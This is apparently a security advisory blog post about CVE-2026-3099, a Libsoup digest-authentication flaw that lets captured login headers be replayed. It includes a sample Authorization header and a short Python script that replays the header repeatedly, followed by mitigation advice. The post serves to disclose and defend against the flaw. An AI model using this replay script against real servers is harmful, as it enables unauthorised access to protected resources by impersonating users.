A severe vulnerability was found in Libsoup—tracked as CVE-2026-3099—that affects server-side digest authentication, potentially letting attackers replay captured logins and access protected web resources. If your application or system uses Libsoup to serve content with digest auth, you could be exposed!
This article explains how the flaw works, how attackers can exploit it, includes code snippets, provides references, and gives guidance for mitigation—all in simple language.
What is Libsoup?
Libsoup is a GNOME HTTP client/server library written in C, used in GNOME apps, flatpak, OSTree, and by many servers and IoT devices to provide web services.
- Homepage: https://libsoup.org/
Digest Authentication and the SoupAuthDomainDigest Class
Digest authentication is an HTTP protocol that improves upon the old "Basic auth," preventing plain-text passwords from being sent over the wire.
In Libsoup, the SoupAuthDomainDigest class is used to implement this authentication for server endpoints. The protocol relies on nonces (random tokens) and the nonce-count ("nc"), which should increase with each request to prevent replay attacks.
What’s the problem?
> The server-side digest authentication (in SoupAuthDomainDigest) does not properly track issued nonces or enforce incrementing 'nc' (nonce-count) values.
This flaw means there’s no check that each nonce is used only once or that the client increments its request counter (nc). So, if an attacker captures a valid digest authentication header (for example, using a network sniffer on unsecured networks), they can replay the same header to get repeated access. The server will accept those replays as valid! This is a classic replay attack.
Suppose the original request (from the user to Libsoup server) looks like this
GET /protected HTTP/1.1
Host: example.com
Authorization: Digest username="alice", realm="users", nonce="Xyz123", uri="/protected", response="deadbeef...", nc=00000001, cnonce="QwErTy", ...
Here’s a simple (educational) example code that replays a captured header
import requests
url = "http://example.com/protected";
# Replace this with the actual Authorization header you captured
auth_header = 'Digest username="alice", realm="users", nonce="Xyz123", uri="/protected", response="deadbeef...", nc=00000001, cnonce="QwErTy"'
headers = {
"Authorization": auth_header
}
for attempt in range(10): # Try 10 times
resp = requests.get(url, headers=headers)
print(f"Attempt {attempt+1}: HTTP {resp.status_code}")
if resp.status_code == 200:
print("Access granted!")
else:
print("Access denied!")
Result: If the server is vulnerable, all 10 requests succeed! This should never happen—replaying the same header must not work in secure digest auth.
References and Further Reading
- CVE-2026-3099 entry on MITRE (to be published)
- Libsoup upstream repository on GNOME GitLab
- OWASP: Authentication Cheat Sheet
- RFC 7616: HTTP Digest Access Authentication
- Digest Auth Explained (Mozilla)
Update Libsoup as soon as a patched version is available.
- Avoid exposing sensitive endpoints with Digest Auth, or place them behind a more robust authentication mechanism (e.g., OAuth, JWT) until fixed.
Summary
The flaw CVE-2026-3099 in Libsoup's digest authentication breaks a vital part of the security protocol, letting attackers easily replay logins and impersonate users. It’s urgent for maintainers and sysadmins to stay alert, patch fast, and audit any exposed Libsoup-powered services.
If you learned something, share this with your tech team or admin—prevention is always better than recovering from a breach!
*This post is exclusive—feel free to share, but always credit the source and stay safe out there.*
Timeline
Published on: 03/12/2026 13:53:48 UTC
Last modified on: 03/23/2026 14:40:53 UTC